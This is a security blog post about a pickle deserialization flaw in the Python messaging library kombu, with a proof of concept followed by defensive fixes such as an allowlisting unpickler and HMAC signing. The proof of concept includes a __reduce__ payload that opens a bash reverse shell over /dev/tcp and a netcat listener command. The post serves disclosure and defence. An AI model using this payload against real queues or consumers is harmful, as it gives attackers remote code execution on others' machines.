Sour Pickles

Authored by Md Abdullahil Kafi, secure software engineer at OpenRefactory. Edited by Charlie Bedard

Introduction

Pickle vulnerabilities are so widespread that they have become common knowledge in the Python world, much like buffer overflows in the C world.

Recently, our team found a deserialization issue (CWE-502: Deserialization of Untrusted Data) in kombu, a messaging library for Python. Like other unsafe deserialization vulnerabilities, this bug can be exploited to gain arbitrary remote code execution (RCE). The maintainers acknowledged the risk, but they were also concerned about backward compatibility.

The kombu messaging library can use RabbitMQ, Redis and other message brokers as transports to deliver messages reliably. kombu supports several message formats, including JSON, YAML, msgpack and pickle.

Our recommendation for kombu was to drop support for pickle, since it already supports other data formats. The maintainers, however, were noncommittal. After all, the pickle library is widely used.

In this blog post, I plan to dig into three things.

1. What can happen if a deserialization vulnerability is exploited? I will describe a proof-of-concept exploit.
2. How is the pickle library used in the world? I will explore the alternatives.
3. How can the pickle library be used in a safe way? I will also highlight some community efforts.

What Happens When a Serialization Vulnerability is Exploited?

Let us demonstrate a proof of concept that exploits this bug to gain arbitrary remote code execution. For this, we will use a RabbitMQ server running in a Docker container as the message transport.

The goals of the attacker:

- Inject a malicious payload into the message queue.
- Ensure that the victim deserializes the payload, triggering the reverse shell.

To accomplish these goals, the attacker might write a simple Python program to produce the payload and put it in the message queue as follows:

				
from __future__ import annotations
from kombu import Connection

class BadClass:
    def __reduce__(self):
        # Tells pickle to call os.system(<command>) when the object is loaded.
        import os
        return (os.system, ("/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1", ))

# Publish the object to the queue, serialized with pickle.
with Connection('amqp://guest:guest@localhost:5672//') as conn:
    simple_queue = conn.SimpleQueue('simple_queue')
    simple_queue.put(BadClass(), serializer='pickle')
    print("Sent")
    simple_queue.close()

The __reduce__() method in BadClass tells pickle how the object should be reconstructed when it is deserialized. It returns a tuple where the first element is a callable (in this case, os.system), and the second element is a tuple of its arguments (/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1). When the object is deserialized, pickle calls os.system with that argument, which runs /bin/bash to create a reverse shell to the attacker’s machine.

The attacker sends the payload to the message queue and starts a netcat listener on port 1337 with nc -nvlp 1337.

The consumer code below is used to fetch and deserialize the pickle object from the message queue.

				
from __future__ import annotations
from kombu import Connection

with Connection('amqp://guest:guest@localhost:5672//') as conn:
    # accept=['pickle'] opts in to deserializing pickle content.
    simple_queue = conn.SimpleQueue('simple_queue', accept=['pickle'])
    message = simple_queue.get(block=True, timeout=1)
    print("Received")
    message.ack()
    simple_queue.close()

When the victim runs the consumer code, they unknowingly execute the malicious code embedded in the object, which establishes the reverse shell for the attacker.

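The whole process can be summarized as follows: the attacker publishes the malicious pickle to the message queue, the victim's consumer fetches and deserializes it, and the resulting shell connects back to the attacker's listener.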

The root cause of this vulnerability is that Python lets an object's __reduce__ method tell the deserializer how to rebuild a pickled object. Attackers can misuse this method to gain RCE as soon as a pickled object is deserialized. The __reduce__ functionality is at the very core of pickle deserialization, and many complex Python objects cannot be correctly deserialized without it.
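To see this mechanism without any risk, here is a minimal sketch that swaps the dangerous callable for a harmless built-in. The class name Harmless and the sample arguments are assumptions made for illustration; only the standard pickle module is used.

```python
import pickle


class Harmless:
    """Illustrative stand-in for BadClass; the callable here is benign."""

    def __reduce__(self):
        # (callable, args): pickle stores a reference to the callable plus
        # its arguments, and calls callable(*args) when the data is loaded.
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Harmless())

# Loading does not rebuild a Harmless instance. It returns whatever the
# stored callable returns, which shows that the pickle decided what to run.
result = pickle.loads(payload)
print(type(result).__name__, result)
```

The loader never checks that the callable has anything to do with the original class, which is why replacing sorted with os.system is all an attacker needs.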

Alternatives to pickle

There have been earlier attempts to make pickle safe to use, e.g., spickle and safepickle. Neither is actively maintained, due to lack of community interest. A more recent effort at a safer implementation of pickle is larch-pickle. It differs from the other two in that it is written from scratch: spickle and safepickle add a layer of abstraction on top of Python’s implementation of pickle, whereas larch-pickle does not. So, there is a risk that it is not compatible with all of pickle's features.

Larch-pickle takes a whitelist approach. When the secure=True parameter is used while loading, it checks whether the class being loaded is in the whitelist. If your class is not in the whitelist, you cannot unpickle it. This prevents unintended classes from being loaded and reduces the attack surface by a large margin. Like the other implementations of pickle, it risks not being properly maintained in the future if there is not enough community support and interest. It also cannot completely prevent a threat actor from gaining RCE; it just makes it harder. Security, after all, is mostly about raising the bar.

Ways to fix pickle bugs

What Have Others Done?

While researching this topic, I compiled a small list of bugs related to unsafe deserialization of pickles that have been registered with a CVE. You can find the list here.

This is only a small sample of the bugs related to pickle. You can find more here. The list shows that many of these bugs remain unpatched for months, even when they are marked critical. Some are disputed by the maintainers, who argue that the bug does not really affect them: they have already warned users about the implications of using pickle, so it is the users' responsibility to use it carefully. It reminds me of how everyone knows that memory corruption vulnerabilities come from programmers not using pointers carefully, and that this is treated as a feature of the language rather than a fault. I hate to say it, but it is true.

Many of the bugs have been fixed by dropping support for pickle and using JSON, YAML or msgpack instead. One fix authenticates the pickles transferred over a socket using HMAC verification. But one fix stands out from the rest: the one for CVE-2024-39705. It stops pickle from deserializing any classes or methods. It does so by deriving a new unpickler class from the original unpickler class and overriding its find_class method. That implementation blocks all classes and methods from being loaded, but it can be modified to allow or disallow specific ones. This way, we can keep using the pickle module from Python’s standard library and still use it more safely. It is an example of what can be done when we really need pickle.
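The find_class approach can be sketched as follows. This is not the actual patch for that CVE; it follows the general pattern of subclassing pickle.Unpickler from the standard library. The allowlist contents, the restricted_loads helper and the Probe class are assumptions made for illustration.

```python
import io
import os
import pickle

# Hypothetical allowlist: the only globals a pickle is allowed to reference.
ALLOWED_GLOBALS = {
    ("builtins", "range"),
    ("builtins", "complex"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # pickle calls find_class for every global (class or function) that
        # a pickle refers to; anything off the allowlist is rejected.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Hypothetical helper: like pickle.loads(), with the allowlist applied."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    """Mimics a malicious payload; the command is a harmless echo."""

    def __reduce__(self):
        return (os.system, ("echo this should never run",))


# Plain data and allowlisted types load as usual.
print(restricted_loads(pickle.dumps({"ids": [1, 2, 3], "span": range(3)})))

# The reference to os.system is refused before anything is called.
try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

An empty allowlist reproduces the block-everything behavior described above, while still letting basic containers, strings and numbers through because they do not need find_class. The allowlist itself must be chosen carefully, since any allowed callable can be invoked with attacker-controlled arguments.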

What We Recommend

There is no one fix to ‘fix-em-all’ for pickle bugs. Even though all pickle bugs arise from deserialization of untrusted data, different situations call for different measures. Some common scenarios and potential fixes for them are listed below:

- If the pickles are only written to and read from the local disk and are never transferred over the network, there is no real risk in using pickle however you wish. If someone untrusted gets write access to your disk, you have something more serious to worry about.
- If the pickles are used to store and load configuration or settings, consider using JSON, YAML or TOML instead. That way, you will also be able to modify the settings outside your application.
- If the pickles contain data such as ML model weights or session state that must not be modified, consider keeping pickle and using HMAC authentication to verify that the pickle has not been tampered with.
- If the pickles are sent over the network between trusted parties, always verify the pickles using HMAC authentication. Also consider encryption if your communication is not already protected by TLS/SSL.
- If the pickles are sent over the network between untrusted parties, drop support for pickle and use a data-only message format like msgpack. If you absolutely need pickle, use a whitelist/blacklist on the receiving end to limit which classes/methods can be unpickled.
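The HMAC verification mentioned in the list can be sketched with the standard hmac and hashlib modules. The function names, the layout (tag followed by pickle bytes) and the example key are assumptions made for illustration; in practice the key must be a secret shared only between the trusted parties.

```python
import hashlib
import hmac
import pickle

DIGEST_SIZE = hashlib.sha256().digest_size  # length of the tag in bytes


def sign_pickle(obj, key: bytes) -> bytes:
    """Hypothetical helper: pickle obj and prepend an HMAC-SHA256 tag."""
    data = pickle.dumps(obj)
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return tag + data


def load_signed_pickle(blob: bytes, key: bytes):
    """Hypothetical helper: verify the tag first, unpickle only if it matches."""
    tag, data = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    # compare_digest runs in constant time to avoid leaking the tag via timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("HMAC mismatch: refusing to unpickle")
    return pickle.loads(data)


key = b"example-key-use-a-real-secret-here"  # placeholder, not a real secret
blob = sign_pickle({"weights": [0.1, 0.2]}, key)
print(load_signed_pickle(blob, key))

# Flipping a single bit in the pickled bytes makes verification fail.
tampered = blob[:-1] + bytes([blob[-1] ^ 1])
try:
    load_signed_pickle(tampered, key)
except ValueError as exc:
    print("rejected:", exc)
```

The important design point is the order of operations: pickle.loads is never reached unless the tag verifies. This protects against tampering in transit or at rest, but it offers no protection if the party holding the key is itself malicious.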

Md. Abdullahil Kafi, security engineer at OpenRefactory, wrote this blog post. You may also be interested to read this other article on the problems with the pickle library.
